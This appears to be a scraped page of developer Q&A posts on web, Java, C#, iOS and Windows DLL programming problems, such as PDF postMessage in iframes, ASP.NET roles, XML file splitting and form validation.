  • postMessage to PDF in an iFrame

    - by Linus
    Here's my situation. I had a webpage with an embedded PDF form. We used a basic object tag (embed in FF) to load the PDF file like this: <object id="pdfForm" height="100%" width="100%" type="application/pdf" data="..url"></object> On this webpage was an Html Save button that would trigger some Javascript which used the postMessage API of the embedded object to execute javascript embedded in the PDF. Basically, that code looked like this: function save() { sendMessage(["submitForm"]); } function sendMessage(aMessage) { pdfObject = document.getElementById("pdfForm"); if (typeof(pdfObject) == "undefined") return; if (typeof (pdfObject.postMessage) == "undefined") return; pdfObject.postMessage(aMessage); } This all was working beautifully. Except we ran into an issue with Firefox so that we need to embed the PDF using iFrame, instead of the object tag. So now, the PDF is embeded using this code: <iframe id="pdfWrapper" src="..someUrl" width="100%" height="800px" frameborder="0"></iframe> Unfortunately, with this code, the javascript for posting a message no longer works, and I can't really figure out how to get access to the pdf object anymore so that I can access the postMessage api. Using fiddler or the chome javascript debugger, it is clear that within the iframe, the browser is automatically generating an embed tag (not an object tag), but that does not let me access the postMessage API. This is the code I'm trying which doesn't work: function sendMessage(aMessage) { var frame = document.getElementById("pdfWrapper"); var doc = null; if (frame.contentDocument) doc = frame.contentDocument; else if (frame.contentWindow) doc = frame.contentWindow.document; else if (frame.document) doc = frame.document; if (doc==null || typeof(doc) == "undefined") return; var pdfObject = doc.embeds[0]; if (pdfObject==null || typeof (pdfObject.postMessage) == "undefined") return; pdfObject.postMessage(aMessage); } Any help on this? Sorry for the long question. EDIT: I've been asked to provide samples in code so that people can test whether the messaging works. Essentially, all you need is any PDF with this javascript embedded. function myOnMessage(aMessage) { app.alert("Hello World!"); } function myOnDisclose(cURL, cDocumentURL) { return true; } function myOnError(error, aMessage) { app.alert(error); } var msgHandlerObject = new Object(); msgHandlerObject.onMessage = myOnMessage; msgHandlerObject.onError = myOnError; msgHandlerObject.onDisclose = myOnDisclose; msgHandlerObject.myDoc = this; this.hostContainer.messageHandler = msgHandlerObject; I realize you need Acrobat pro to create PDFs with javascript, so to make this easier, I posted sample code--both working and non working scenarios--at this url: http://www.filedropper.com/pdfmessage You can download the zip and extract it to /inetpub/wwwroot if you use Windows, and then point your browser to either the works.htm or fails.htm. Thanks for any help you can give.

  • ASP.net roles and Projects

    - by Zyphrax
    EDIT - Rewrote my original question to give a bit more information Background info At my work I'm working on a ASP.Net web application for our customers. In our implementation we use technologies like Forms authentication with MembershipProviders and RoleProviders. All went well until I ran into some difficulties with configuring the roles, because the roles aren't system-wide, but related to the customer accounts and projects. I can't name our exact setup/formula, because I think our company wouldn't approve that... What's a customer / project? Our company provides management information for our customers on a yearly (or other interval) basis. In our systems a customer/contract consists of: one Account: information about the Company per Account, one or more Products: the bundle of management information we'll provide per Product, one or more Measurements: a period of time, in which we gather and report the data Extranet site setup Eventually we want all customers to be able to access their management information with our online system. The extranet consists of two sites: Company site: provides an overview of Account information and the Products Measurement site: after selecting a Measurement, detailed information on that period of time The measurement site is the most interesting part of the extranet. We will create submodules for new overviews, reports, managing and maintaining resources that are important for the research. Our Visual Studio solution consists of a number of projects. One web application named Portal for the basis. The sites and modules are virtual directories within that application (makes it easier to share MasterPages among things). What kind of roles? The following users (read: roles) will be using the system: Admins: development users :) (not customer related, full access) Employees: employees of our company (not customer related, full access) Customer SuperUser: top level managers (full access to their account/measurement) Customer ContactPerson: primary contact (full access to their measurement(s)) Customer Manager: a department manager (limited access, specific data of a measurement) What about ASP.Net users? The system will have many ASP.Net users, let's focus on the customer users: Users are not shared between Accounts SuperUser X automatically has access to all (and new) measurements User Y could be Primary contact for Measurement 1, but have no role for Measurement 2 User Y could be Primary contact for Measurement 1, but have a Manager role for Measurement 2 The department managers are many individual users (per Measurement), if Manager Z had a login for Measurement 1, we would like to use that login again if he participates in Measurement 2. URL structure These are typical urls in our application: http://host/login - the login screen http://host/project - the account/product overview screen (measurement selection) http://host/project/1000 - measurement (id:1000) details http://host/project/1000/planning - planning overview (for primary contact/superuser) http://host/project/1000/reports - report downloads (manager department X can only access report X) We will also create a document url, where you can request a specific document by it's GUID. The system will have to check if the user has rights to the document. The document is related to a Measurement, the User or specific roles have specific rights to the document. What's the problem? (finally ;)) Roles aren't enough to determine what a user is allowed to see/access/download a specific item. It's not enough to say that a certain navigation item is accessible to Managers. When the user requests Measurement 1000, we have to check that the user not only has a Manager role, but a Manager role for Measurement 1000. Summarized: How can we limit users to their accounts/measurements? (remember superusers see all measurements, some managers only specific measurements) How can we apply roles at a product/measurement level? (user X could be primarycontact for measurement 1, but just a manager for measurement 2) How can we limit manager access to the reports screen and only to their department's reports? All with the magic of asp.net classes, perhaps with a custom roleprovider implementation. • Is the Cloud ready for an Enterprise Java web application? Seeking a JEE hosting advice.

    - by Jakub Holý
    Greetings to all the smart people around here! I'd like to ask whether it is feasible or a good idea at all to deploy a Java enterprise web application to a Cloud such as Amazon EC2. More exactly, I'm looking for infrastructure options for an application that shall handle few hundred users with long but neither CPU nor memory intensive sessions. I'm considering dedicated servers, virtual private servers (VPSs) and EC2. I've noticed that there is a project called JBoss Cloud so people are working on enabling such a deployment, on the other hand it doesn't seem to be mature yet and I'm not sure that the cloud is ready for this kind of applications, which differs from the typical cloud-based applications like Twitter. Would you recommend to deploy it to the cloud? What are the pros and cons? The application is a Java EE 5 web application whose main function is to enable users to compose their own customized Product by combining the available Parts. It uses stateless and stateful session beans and JPA for persistence of entities to a RDBMS and fetches information about Parts from the company's inventory system via a web service. Aside of external users it's used also by few internal ones, who are authenticated against the company's LDAP. The application should handle around 300-400 concurrent users building their product and should be reasonably scalable and available though these qualities are only of a medium importance at this stage. I've proposed an architecture consisting of a firewall (FW) and load balancer supporting sticky sessions and https (in the Cloud this would be replaced with EC2's Elastic Load Balancing service and FW on the app. servers, in a physical architecture the load-balancer would be a HW), then two physical clustered application servers combined with web servers (so that if one fails, a user doesn't loose his/her long built product) and finally a database server. The DB server would need a slave backup instance that can replace the master instance if it fails. This should provide reasonable availability and fault tolerance and provide good scalability as long as a single RDBMS can keep with the load, which should be OK for quite a while because most of the operations are done in the memory using a stateful bean and only occasionally stored or retrieved from the DB and the amount of data is low too. A problematic part could be the dependency on the remote inventory system webservice but with good caching of its outputs in the application it should be OK too. Unfortunately I've only vague idea of the system resources (memory size, number and speed of CPUs/cores) that such an "average Java EE application" for few hundred users needs. My rough and mostly unfounded estimate based on actual Amazon offerings is that 1.7GB and a single, 2-core "modern CPU" with speed around 2.5GHz (the High-CPU Medium Instance) should be sufficient for any of the two application servers (since we can handle higher load by provisioning more of them). Alternatively I would consider using the Large instance (64b, 7.5GB RAM, 2 cores at 1GHz) So my question is whether such a deployment to the cloud is technically and financially feasible or whether dedicated/VPS servers would be a better option and whether there are some real-world experiences with something similar. Thank you very much! /Jakub Holy PS: I've found the JBoss EAP in a Cloud Case Study that shows that it is possible to deploy a real-world Java EE application to the EC2 cloud but unfortunately there're no details regarding topology, instance types, or anything :-(

  • Why isn't this javascript with else if working?

    - by Uni
    I'm sorry I can't be any more specific - I have no idea where the problem is. I'm a total beginner, and I've added everything I know to add to the coding, but nothing happens when I push the button. I don't know at this point if it's an error in the coding, or a syntax error that makes it not work. Basically I am trying to get this function "Rip It" to go through the list of Dewey decimal numbers, change some of them, and return the new number and a message saying it's been changed. There is also one labeled "no number" that has to return an error (not necessarily an alert box, a message in the same space is okay.) I am a total beginner and not particularly good at this stuff, so please be gentle! Many thanks! <!DOCTYPE html> <html> <head> <script type="text/javascript"> function RipIt() { for (var i = l; i <=10 i=i+l) { var dewey=document.getElementById(i); dewey=parseFloat(dewey); if (dewey >= 100 && 200 >= dewey) { document.getElementById('dewey'+ 100) } else if (dewey >= 400 && 500 >= dewey) { document.getElementById('dewey'+ 200) } else if (dewey >= 850 && 900 >= dewey) { document.getElementById('dewey'-100) } else if (dewey >= 600 && 650 >= dewey) { document.getElementById('dewey'+17) } } } </script> </head> <body> <h4>Records to Change</h4> <ul id="myList"> <li id ="1">101.33</li> <li id = "2">600.01</li> <li id = "3">001.11</li> <li id = "4">050.02</li> <li id = "5">199.52</li> <li id = "6">400.27</li> <li id = "7">401.73</li> <li id = "8">404.98</li> <li id = "9">no number</li> <li id = "10">850.68</li> <li id = "11">853.88</li> <li id = "12">407.8</li> <li id = "13">878.22</li> <li id = "14">175.93</li> <li id = "15">175.9</li> <li id = "16">176.11</li> <li id = "17">190.97</li> <li id = "18">90.01</li> <li id = "19">191.001</li> <li id = "20">600.95</li> <li id = "21">602.81</li> <li id = "22">604.14</li> <li id = "23">701.31</li> <li id = "24">606.44</li> <li id = "25">141.77</li> </ul> <b> </b> <input type="button" value="Click To Run" onclick="RipIt()"> <!-- <input type="button" value="Click Here" onClick="showAlert();"> --> </body> </html>

  • Function calls not working in my page

    - by Vivek Dragon
    I made an select menu that works with the google-font-Api. I made to function in JSBIN here is my work http://jsbin.com/ocutuk/18/ But when i made the copy of my code in a html page its not even loading the font names in page. i tried to make it work but still it is in dead end. • Change the content of a <style> element through JavaScript

    - by paercebal
    The Problem I have the following code: <html> <head> <style id="ID_Style"> .myStyle { color : #FF0000 ; } </style> </head> <body> <p class="myStyle"> Hello World ! </p> </body> </html> And I want to modify the contents of <style> through JavaScript. The Expected Solution The first solution was to use the innerHTML property of the style element (retrieved through its id), but while it works on Firefox, it fails on Internet Explorer 7. So, I used pure DOM methods, that is, creating an element called style, a text node with the desired content, and append the text node as a child of the style node, etc. It fails, too. According to MSDN, the <style> element has an innerHTML property, and according to W3C, the <style> element is a HTMLStyleElement, which derives from HTMLElement, deriving from Element deriving from Node, which has the appendChild method. It seems to behave as if the content of a <style> element was readonly on Internet Explorer. The Question So the question is: Is there a way to modify the content of a <style> element on Internet Explorer? While the current problem is with IE7, a cross-browser solution would be cool, if possible. Appendix Sources: Style Element (MSDN): http://msdn.microsoft.com/en-us/library/ms535898.aspx HTMLStyleElement (W3C): http://www.w3.org/TR/2003/REC-DOM-Level-2-HTML-20030109/html.html#ID-16428977 Complete Test Code You can use this test code if you want to reproduce your problem: <html> <head> <style id="ID_Style"> .myStyle { color : #FF0000 ; } </style> <script> function replaceStyleViaDOM(p_strContent) { var oOld = document.getElementById("ID_Style") ; var oParent = oOld.parentNode ; oParent.removeChild(oOld) ; var oNew = document.createElement("style") ; oParent.appendChild(oNew) ; oNew.setAttribute("id", "ID_Style") ; var oText = document.createTextNode(p_strContent) ; oNew.appendChild(oText) ; } function replaceStyleViaInnerHTML(p_strContent) { document.getElementById("ID_Style").innerHTML = p_strContent ; } </script> <script> function setRedViaDOM() { replaceStyleViaDOM("\n.myStyle { color : #FF0000 ; }\n") } function setRedViaInnerHTML() { replaceStyleViaInnerHTML("\n.myStyle { color : #FF0000 ; }\n") } function setBlueViaDOM() { replaceStyleViaDOM("\n.myStyle { color : #0000FF ; }\n") } function setBlueViaInnerHTML() { replaceStyleViaInnerHTML("\n.myStyle { color : #0000FF ; }\n") } function alertStyle() { alert("*******************\n" + document.getElementById("ID_Style").innerHTML + "\n*******************") ; } </script> </head> <body> <div> <button type="button" onclick="alertStyle()">alert Style</button> <br /> <button type="button" onclick="setRedViaDOM()">set Red via DOM</button> <button type="button" onclick="setRedViaDOM()">set Red via InnerHTML</button> <br /> <button type="button" onclick="setBlueViaDOM()">set Blue via DOM</button> <button type="button" onclick="setBlueViaInnerHTML()">set Blue via InnerHTML</button> </div> <p class="myStyle"> Hello World ! </p> </body> </html> Thanks !

  • How to prevent client from accessing JSP page

    - by Ali Bassam
    In my web application, I use the .load() function in JQuery, to load some JSP pages inside a DIV. $("#myDiv").load("chat.jsp"); In chat.jsp, no Java codes is executed unless this client has Logged in, means, I check the session. String sessionId = session.getAttribute("SessionId"); if(sessionId.equals("100")){ //execute codes }else{ //redirect to log in page } Those java codes that will be executed, they will out.println(); some HTML elements. I don't want the client to write /chat.jsp in the browser to access this page, as it will look bad, and the other stuff in the main page won't be there, and this could do a harm to the web app security. How can I restrict someone from accessing chat.jsp directly, but yet keep it accessible via .load() ? UPDATE: JavaDB is a class that I made, it connects me to the Database. This is chat.jsp <body> <% String userId = session.getAttribute("SessionId").toString(); if (userId != null) { String roomId = request.getParameter("roomId"); String lastMessageId = request.getParameter("lastMessageId"); JavaDB myJavaDB = new JavaDB(); myJavaDB.Connect("Chat", "chat", "chat"); Connection conn = myJavaDB.getMyConnection(); Statement stmt = conn.createStatement(); String lastId = ""; int fi = 0; ResultSet rset = stmt.executeQuery("select message,message_id,first_name,last_name from users u,messages m where u.user_id=m.user_id and m.message_id>" + lastMessageId + " and room_id=" + roomId + " order by m.message_id asc"); while (rset.next()) { fi = 1; lastId = rset.getString(2); %> <div class="message"> <div class="messageSender"> <%=rset.getString(3) + " " + rset.getString(4)%> </div> <div class="messageContents"> <%=rset.getString(1)%> </div> </div> <% } %> <div class="lastId"> <% if (fi == 1) {%> <%=lastId%> <% } else {%> <%=lastMessageId%> <% }%></div> <% if (fi == 1) {%> <div class="messages"> </div> <% } } else { response.sendRedirect("index.jsp"); }%> </body> Guys I don't know what Filter means. UPDATE If I decided to send a parameter that tells me that this request came from Jquery. .load("chat.jsp",{ jquery : "yes" }); And then check it in chat.jsp String yesOrNo = request.getParameter("jquery"); Then they can simply hack this by using this URL. /chat.jsp?jquer=yes or something like that.. UPDATE I tried Maksim's advice, I got this when I tried to access chat.jsp. Is this the desired effect?

  • Suggestions on how to map from Domain (ORM) objects to Data Transfer Objects (DTO)

    - by FryHard
    The current system that I am working on makes use of Castle Activerecord to provide ORM (Object Relational Mapping) between the Domain objects and the database. This is all well and good and at most times actually works well! The problem comes about with Castle Activerecords support for asynchronous execution, well, more specifically the SessionScope that manages the session that objects belong to. Long story short, bad stuff happens! We are therefore looking for a way to easily convert (think automagically) from the Domain objects (who know that a DB exists and care) to the DTO object (who know nothing about the DB and care not for sessions, mapping attributes or all thing ORM). Does anyone have suggestions on doing this. For the start I am looking for a basic One to One mapping of object. Domain object Person will be mapped to say PersonDTO. I do not want to do this manually since it is a waste. Obviously reflection comes to mind, but I am hoping with some of the better IT knowledge floating around this site that "cooler" will be suggested. Oh, I am working in C#, the ORM objects as said before a mapped with Castle ActiveRecord. Example code: By @ajmastrean's request I have linked to an example that I have (badly) mocked together. The example has a capture form, capture form controller, domain objects, activerecord repository and an async helper. It is slightly big (3MB) because I included the ActiveRecored dll's needed to get it running. You will need to create a database called ActiveRecordAsync on your local machine or just change the .config file. Basic details of example: The Capture Form The capture form has a reference to the contoller private CompanyCaptureController MyController { get; set; } On initialise of the form it calls MyController.Load() private void InitForm () { MyController = new CompanyCaptureController(this); MyController.Load(); } This will return back to a method called LoadComplete() public void LoadCompleted (Company loadCompany) { _context.Post(delegate { CurrentItem = loadCompany; bindingSource.DataSource = CurrentItem; bindingSource.ResetCurrentItem(); //TOTO: This line will thow the exception since the session scope used to fetch loadCompany is now gone. grdEmployees.DataSource = loadCompany.Employees; }, null); } } this is where the "bad stuff" occurs, since we are using the child list of Company that is set as Lazy load. The Controller The controller has a Load method that was called from the form, it then calls the Asyc helper to asynchronously call the LoadCompany method and then return to the Capture form's LoadComplete method. public void Load () { new AsyncListLoad<Company>().BeginLoad(LoadCompany, Form.LoadCompleted); } The LoadCompany() method simply makes use of the Repository to find a know company. public Company LoadCompany() { return ActiveRecordRepository<Company>.Find(Setup.company.Identifier); } The rest of the example is rather generic, it has two domain classes which inherit from a base class, a setup file to instert some data and the repository to provide the ActiveRecordMediator abilities.

    In my index.php I've a ajax pager that load a content page (paginator.php). index.php <script type='text/javascript' src='js/jquery-1.11.1.min.js'></script> <script type='text/javascript' src='js/paginator.js'></script> <script type='text/javascript' src='js/functions.js'></script> <!-- Add fancyBox --> <script type="text/javascript" src="js/jquery.fancybox.pack.js?v=2.1.5"></script> <html> <div id="content"></div> paginator.js $(function() { var pageurl = 'paginator.php'; //Initialise the table at the first run $( '#content' ).load( pageurl, { pag: 1 }, function() { //animation(); }); //Page navigation click $( document ).on( 'click', 'li.goto', function() { //Get the id of clicked li var pageNum = $( this ).attr( 'id' ); $( '#content' ).load( pageurl, { pag: pageNum }, function() { //animation(); }); }); }); /* END */ paginator.php <ul><li>..etc </ul> ... ... <a id='test' vid='123'>get the id</a> <a id='test2' url='somepage.php'>open fancybox</a> I would like to take a variable of the loaded page (paginator.php) in this way but unfortunately I can not. functions.js $(function() { $('#test' ).click(function(e) { var id = $('#test').attr('vid'); alert ("vid is " + vid); }); }); /* END */ In this case popup not appear. I tried with add fancybox in my functions.js. Dialog box appear but the url attr is not taken. var url = $('#test2').attr('url'); $('#test').fancybox({ 'href' : url, 'width' : 100, 'height' : 100, 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe', 'fitToView' : true, 'autoSize' : false }); In other scenarios, without having the page loaded, I can do it, but in this case the behavior is different. How could I do this? thanks EDIT my goal is to open a dialog (fancybox) taking a variable from the loaded page EDIT2 I tried in this way paginator.php <a id="test" vid="1234">click me</a> paginator.js //Initialise the table at the first run $( '#content' ).load( pageurl, { pag: 1 }, function() { hide_anim(); popup(); }); //Page navigation click $( document ).on( 'click', 'li.goto', function() { //Get the id of clicked li var pageNum = $( this ).attr( 'id' ); $( '#content' ).load( pageurl, { pag: pageNum }, function() { hide_anim(); popup(); }); }) function.js function popup() { $('#test' ).click(function(e) { e.preventDefault(); var vid = $('#test').attr('vid'); alert ("vid is " + vid); }); } But popup not appear...

  • infoWindow position and click/unclick controls - controlling KML groundoverlays

    - by wendysmith
    I've made a lot of progress on this project (with earlier help with forum member Eric Badger, thanks!!) but I now need help with fine-tuning the infoWindow. Presently, you checkbox one of the historic maps choices -- the map appears as a ground overlay, and if you click it, you get info about the map which appears in a div (yellow area at the bottom). I want the info to appear in a more traditional window on the map, just to the center-right of the overlay map. It should have a close-option (X at the top corner?) Also, if you uncheck one of the boxes -- the overlay map disappears but the info window should close as well.  As you see my javascript skills are very limited. I would very much appreciate your help with this. Here's the test webpage: Here's the script: function showphilpottsmap(philpottsmapcheck) { if (philpottsmapcheck.checked == true) { philpottsmap.setMap(map); } else { philpottsmap.setMap(null); } } function showbrownemap(brownemapcheck) { if (brownemapcheck.checked == true) { brownemap.setMap(map); } else { brownemap.setMap(null); } } function showchewettmap(chewettmapcheck) { if (chewettmapcheck.checked == true) { chewettmap.setMap(map); } else { chewettmap.setMap(null); } } function showjamescanemap(jamescanemapcheck) { if (jamescanemapcheck.checked == true) { jamescanemap.setMap(map); } else { jamescanemap.setMap(null); } } var infoWindow = new google.maps.InfoWindow(); function openIW(FTevent) { infoWindow.setContent(FTevent.infoWindowHtml); infoWindow.setPosition(FTevent.latLng); infoWindow.setOptions({ content: FTevent.infoWindowHtml, position: FTevent.latLng, pixelOffset: FTevent.pixelOffset }); infoWindow.open(map); } var philpottsmap; var brownemap; var chewettmap; var jamescanemap; function initialize() { var mylatlng = new google.maps.LatLng(43.65241745, -79.393923); var myOptions = { zoom: 11, center: mylatlng, streetViewControl: false, mapTypeId: google.maps.MapTypeId.ROADMAP, }; map = new google.maps.Map(document.getElementById("map_canvas"), myOptions); //End map parameters brownemap = new google.maps.KmlLayer('http://wendysmithtoronto.com/mapping/1851map_jdbrowne.kml', {preserveViewport:true, suppressInfoWindows:true}); google.maps.event.addListener(brownemap, 'click', function(kmlEvent) { document.getElementById('sidebarinfo').innerHTML = kmlEvent.featureData.description; }); chewettmap = new google.maps.KmlLayer('http://wendysmithtoronto.com/mapping/1802mapwilliamchewett.kml', {preserveViewport:true, suppressInfoWindows:true}); google.maps.event.addListener(chewettmap, 'click', function(kmlEvent) { document.getElementById('sidebarinfo').innerHTML = kmlEvent.featureData.description; }); philpottsmap = new google.maps.KmlLayer('http://wendysmithtoronto.com/mapping/1818map_phillpotts.kml', {preserveViewport:true, suppressInfoWindows:true}); google.maps.event.addListener(philpottsmap, 'click', function(kmlEvent) { document.getElementById('sidebarinfo').innerHTML = kmlEvent.featureData.description; }); jamescanemap = new google.maps.KmlLayer('http://wendysmithtoronto.com/mapping/1842jamescanemapd.kml', {preserveViewport:true, suppressInfoWindows:true}); google.maps.event.addListener(jamescanemap, 'click', function(kmlEvent) { document.getElementById('sidebarinfo').innerHTML = kmlEvent.featureData.description; }); } Thanks very much!   • All UITableCells rendered at once... why?

    - by Greg
    I'm extremely confused by the proper behavior of UITableView cell rendering. Here's the situation: I have a list of 250 items that are loading into a table view, each with an image. To optimize the image download, I followed along with Apple's LazyTableImages sample code... pretty much following it exactly. Really good system... for reference, here's the cell renderer within the Apple sample code: - (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath { // customize the appearance of table view cells // static NSString *CellIdentifier = @"LazyTableCell"; static NSString *PlaceholderCellIdentifier = @"PlaceholderCell"; // add a placeholder cell while waiting on table data int nodeCount = [self.entries count]; if (nodeCount == 0 && indexPath.row == 0) { UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:PlaceholderCellIdentifier]; if (cell == nil) { cell = [[[UITableViewCell alloc] initWithStyle:UITableViewCellStyleSubtitle reuseIdentifier:PlaceholderCellIdentifier] autorelease]; cell.detailTextLabel.textAlignment = UITextAlignmentCenter; cell.selectionStyle = UITableViewCellSelectionStyleNone; } cell.detailTextLabel.text = @"Loading…"; return cell; } UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:CellIdentifier]; if (cell == nil) { cell = [[[UITableViewCell alloc] initWithStyle:UITableViewCellStyleSubtitle reuseIdentifier:CellIdentifier] autorelease]; cell.selectionStyle = UITableViewCellSelectionStyleNone; } // Leave cells empty if there's no data yet if (nodeCount > 0) { // Set up the cell... AppRecord *appRecord = [self.entries objectAtIndex:indexPath.row]; cell.textLabel.text = appRecord.appName; cell.detailTextLabel.text = appRecord.artist; // Only load cached images; defer new downloads until scrolling ends if (!appRecord.appIcon) { if (self.tableView.dragging == NO && self.tableView.decelerating == NO) { [self startIconDownload:appRecord forIndexPath:indexPath]; } // if a download is deferred or in progress, return a placeholder image cell.imageView.image = [UIImage imageNamed:@"Placeholder.png"]; } else { cell.imageView.image = appRecord.appIcon; } } return cell; } So – my implementation of Apple's LazyTableImages system has one crucial flaw: it starts all downloads for all images immediately. Now, if I remove this line: //[self startIconDownload:appRecord forIndexPath:indexPath]; Then the system behaves exactly like you would expect: new images load as their placeholders scroll into view. However, the initial view cells do not automatically load their images without that prompt in the cell renderer. So, I have a problem: with the prompt in the cell renderer, all images load at once. Without the prompt, the initial view doesn't load. Now, this works fine in Apple sample code, which got me wondering what was going on with mine. It's almost like it was building all cells up front rather than just the 8 or so that would appear within the display. So, I got looking into it, and this is indeed the case... my table is building 250 unique cells! I didn't think the UITableView worked like this, I guess I thought it only built as many items as were needed to populate the table. Is this the case, or is it correct that it would build all 250 cells up front? Also – related question: I've tried to compare my implementation against the Apple LazyTableImages sample, but have discovered that NSLog appears to be disabled within the Apple sample code (which makes direct behavior comparisons extremely difficult). Is that just a simple publish setting somewhere, or has Apple somehow locked down their samples so that you can't log output at runtime? Thanks!

  • Cutting large XML file into smaller pieces in C#

    - by NDraskovic
    I have a problem that I'm working on for quite some time now. I have an XML file with over 50000 records (one record has 3 levels). This file is used by one of my applications to control document sending (the record holds, among other informations, the type of document that has to be sent to a certain person). So in my application I load the XML file into a XmlDocument, and then by using SelectNodes method, I create a XmlNodeList from which I read the data I want. The process is like this - our worker takes the persons ID card (simple eith barcode) and reads it with barcode reader. When the barcode value has been read, my application finds the person with that ID in the XML file, and stores the type of the document into a string variable. Then the worker takes the document and reads its barcode, and if the value of documents barcode and the value in the value in the string variable match, the application makes a record that document of type xxxxxxxx will be sent to the person with ID yyyyyyyyy. This is very simple code, it works perfectly for now, and this is how it looks: On textBox1_TextChanged event (worker read persons ID): foreach(XmlNode node in NodeList){ if(String.Compare(node.Attributes.GetNamedItem("ID").Value.ToString(),textBox1.Text)==0) { ControlString = node.ChildNode[3].FirstChild.Attributes.GetNamedItem("doctype").Value.ToString(); break; } } textBox2.Focus(); And on textBox2_TextChanged event (worker read the documents barcode): if(String.Compare(textBox2.Text,ControlString)==0) { //Create a record and insert it into a SQL database } My question is - how will my application perform with larger XML files (I was told that the XML file might be up to 500,000 records large), will this approach be valid, or will I need to cut the file into smaller files. If I have to cut it, please give me an idea with some code samples, I've tried to do it like this: Reading entire record and storing it into a string: private void WriteXml(XmlNode record) { tempXML = record.InnerXml; temp = "<" + record.Name + " code=\"" + record.Attributes.GetNamedItem("code").Value + "\">" + Environment.NewLine; temp += tempXML + Environment.NewLine; temp += "</" + record.Name + ">"; SmallerXMLDocument += temp + Environment.NewLine; temp = ""; i++; } tempXML, temp and SmallerXMLDocument are all string variables. And then in button_Click method I load the XML file into a XmlNodeList (again by using XmlDocument.SelectNodes method) and I try to create one big string value that would hold all records like this: foreach(XmlNode node in nodes) { if(String.Compare(node.ChildNode[3].FirstChild.Attributes.GetNamedItem("doctype").Value.ToString(),doctype1)==0) { WriteXML(node); } } My idea was to create a string value (in this case called SmallerXmlDocument), and when I pass trough the entire XML file, to simply copy the value of that string into a new file. This works, but only for files that have up to 2000 records (and my has way more than that). So, if I need to cut the file into smaller pieces, what would be the best way to do it (keep in mind that there could be up to half a million records in a XML file)? Thanks

  • Loading multiple copies of a group of DLLs in the same process

    - by george
    Background I'm maintaining a plugin for an application. I'm Using Visual C++ 2003. The plugin is composed of several DLLs - there's the main DLL, that's the one that the application loads using LoadLibrary, and there are several utility DLLs that are used by the main DLL and by each other. Dependencies generally look like this: plugin.dll - utilA.dll, utilB.dll utilA.dll - utilB.dll utilB.dll - utilA.dll, utilC.dll You get the picture. Some of the dependencies between the DLLs are load-time and some run-time. All the DLL files are stored in the executable's directory (not a requirement, just how it works now). The problem There's a new requirement - running multiple instances of the plugin within the application. The application runs each instance of a plugin in its own thread, i.e. each thread calls The plugin's code, however, is nothing but thread-safe - lots of global variables etc.. Unfortunately, fixing the whole thing isn't currently an option, so I need a way to load multiple (at most 3) copies of the plugin's DLLs in the same process. Option 1: The distinct names approach Creating 3 copies of each DLL file, so that each file has a distinct name. e.g. plugin1.dll, plugin2.dll, plugin3.dll, utilA1.dll, utilA2.dll, utilA3.dll, utilB1.dll, etc.. The application will load plugin1.dll, plugin2.dll and plugin3.dll. The files will be in the executable's directory. For each group of DLLs to know each other by name (so the inter-dependencies work), the names need to be known at compilation time - meaning the DLLs need to be compiled multiple times, only each time with different output file names. Not very complicated, but I'd hate having 3 copies of the VS project files, and don't like having to compile the same files over and over. Option 2: The side-by-side assemblies approach Creating 3 copies of the DLL files, each group in its own directory, and defining each group as an assembly by putting an assembly manifest file in the directory, listing the plugin's DLLs. Each DLL will have an application manifest pointing to the assembly, so that the loader finds the copies of the utility DLLs that reside in the same directory. The manifest needs to be embedded for it to be found when a DLL is loaded using LoadLibrary. I'll use mt.exe from a later VS version for the job, since VS2003 has no built-in manifest embedding support. I've tried this approach with partial success - dependencies are found during load-time of the DLLs, but not when a DLL function is called that loads another DLL. This seems to be the expected behavior according to this article - A DLL's activation context is only used at the DLL's load-time, and afterwards it's deactivated and the process's activation context is used. I haven't yet tried working around this using ISOLATION_AWARE_ENABLED. Questions Got any other options? Any quick & dirty solution will do. :-) Will ISOLATION_AWARE_ENABLED even work with VS2003? Comments will be greatly appreciated. Thanks!

  • Form submit in javascript

    - by zac
    Hi been wrestling this form and the last step (actually submitting) has me scratching my head. What I have so far is the form: <form id="theForm" method='post' name="emailForm"> <table border="0" cellspacing="2"> <td>Email <span class="red">*</span></td><td><input type='text'class="validate[required,custom[email]]" size="30"></td></tr> <td>First Name:</td><td><input type='text' name='email[first]' id='first_name' size=30></td></tr> <tr height="30"> <td cellpadding="4">Last Name:</td><td><input type='text' name='email[last]' id='e_last_name' size=30> <td>Birthday</td> <td><select name='month' style='width:70px; margin-right: 10px'> <option value=''>Month</option> <option value="1">Jan</option> <option value="2">Feb</option> .... </select><select name='day' style='width:55px; margin-right: 10px'> <option value=''>Day</option> <option value="1">1</option> <option value="2">2</option> ... <option value="31">31</option> </select><select name='year' style='width:60px;' > <option value=''>Year</option> <option value="2007">2007</option> <option value="2006">2006</option> <option value="2005">2005</option> ... </select> <input type='image' src='{{skin url=""}}images/email/signUpButt.gif' value='Submit' onClick="return checkAge()" /> <input type="hidden" id= "under13" name="under13" value="No"> and a script that checks the age and sets a cookie/changes display function checkAge() { var min_age = 13; var year = parseInt(document.forms["emailForm"]["year"].value); var month = parseInt(document.forms["emailForm"]["month"].value) - 1; var day = parseInt(document.forms["emailForm"]["day"].value); var theirDate = new Date((year + min_age), month, day); var today = new Date; if ( (today.getTime() - theirDate.getTime()) < 0) { var el = document.getElementById('emailBox'); if(el){ el.className += el.className ? ' youngOne' : 'youngOne'; } document.getElementById('emailBox').innerHTML = "<style type=\"text/css\">.formError {display:none}</style><p>Good Bye</p><p>You must be 13 years of age to sign up.</p>"; createCookie('age','not13',0) return false; } else { createCookie('age','over13',0) return true; }} that all seems to be working well.. just missing kind of a crucial step of actually submitting the form if it validates (if they pass the age question). So I am thinking that this will be wrapped in that script.. something in here : else { createCookie('age','over13',0) return true; } Can someone please help me figure out how I could handle this submit?

